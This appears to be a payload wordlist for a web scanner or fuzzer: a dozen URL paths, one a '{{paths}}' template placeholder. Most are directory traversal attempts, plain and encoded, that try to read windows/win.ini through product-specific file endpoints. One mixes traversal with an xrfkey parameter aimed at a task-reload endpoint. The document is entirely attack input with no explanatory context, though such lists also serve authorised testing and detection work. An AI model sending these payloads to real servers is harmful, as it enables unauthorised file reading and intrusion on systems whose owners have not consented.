/AvalancheWeb/image?imageFilePath=C:/windows/win.ini
/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini
/..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini
/..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/../../../../../../windows/win.ini
{{paths}}
/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null
/wsman
/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf
